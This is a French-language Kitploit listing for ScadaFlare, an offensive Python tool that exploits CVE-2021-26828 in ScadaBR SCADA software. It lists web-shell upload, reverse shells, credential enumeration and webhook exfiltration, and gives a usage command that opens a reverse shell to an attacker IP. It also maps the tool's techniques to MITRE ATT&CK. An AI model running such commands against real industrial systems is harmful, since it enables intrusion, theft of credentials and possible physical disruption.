Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework d'exploitation RCE authentifiée pour ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Outils/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Génération de PayloadsAnalyse des VulnérabilitésExploitationSécurité SCADA/ICSExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework d'exploitation RCE authentifiée pour ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

5il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

ScadaFlare - CVE-2021-26828 Kit d'exploitation RCE authentifié

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Un exploit RCE modulaire post-authentification ciblant ScadaBR <1.1.0, amélioré pour les opérations d'équipe rouge.

ScadaFlare Demo

Fonctionnalités

  • Télécharge un shell .jsp armé via view_edit.shtm
  • Prend en charge les payloads Linux et Windows
  • Support des proxy SOCKS5 / HTTP
  • Déclenchement de reverse shell (standard ou base64)
  • Modules d'énumération (BDD, identifiants, Log4Shell, etc.)
  • Exfiltration par webhook (Slack / Discord)
  • Génération de script de ressources Metasploit
  • Prise en charge du nettoyage (kill switch)

Cartographie des techniques MITRE ATT&CK

CVE

  • CVE-2021-26828
  • Découvert par Fellipe Oliveira
  • Exploit amélioré et modularisé

Pourquoi cela existe

Cet exploit a été développé lors de l'analyse du scénario HTB Pro Lab : Alchemy. Le PoC original de Fellipe Oliveira était solide mais :

Écrit en Python 2

Manquait de fonctionnalités modernes comme le support des proxy, le nettoyage du shell, le chaînage d'énumération

Était difficile à étendre ou intégrer dans les workflows des équipes rouges

Cette version, ScadaFlare, est une réécriture complète en Python 3 avec un support modulaire, plusieurs stratégies d'évasion, le remplacement de la détection d'OS, l'intégration de webhooks, le support des proxy SOCKS et des chaînes d'énumération pour une utilisation opérationnelle réelle.

Utilisation

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Utilisation légale et éthique uniquement

ScadaFlare est conçu exclusivement pour :

  • L'éducation au hacking éthique
  • Les tests en laboratoire SCADA
  • La recherche défensive et la validation de vulnérabilités

Une utilisation non autorisée contre des systèmes industriels réels peut :

  • Perturber des processus physiques
  • Causer des dommages ou des risques de sécurité
  • Entraîner de graves conséquences juridiques

En utilisant cet outil, vous acceptez l'entière responsabilité de :

  • Obtenir une autorisation écrite explicite
  • Opérer uniquement dans des environnements approuvés

Licence

Licence MIT – voir LICENSE

Télécharger l’outil
PhaseTechniqueID
Accès initial (post-authentification)Comptes validesT1078
ExécutionExploitation d'application publiqueT1190
Exécution de commandesWeb ShellT1505.003
Actions de privilègeModification de contenu webT1505
Accès aux identifiantsIdentifiants dans les fichiers de configurationT1552.001
DécouverteDécouverte de système distantT1018
ExfiltrationExfiltration via service webT1567.002
Évasion de la défenseTunnel proxy et protocoleT1090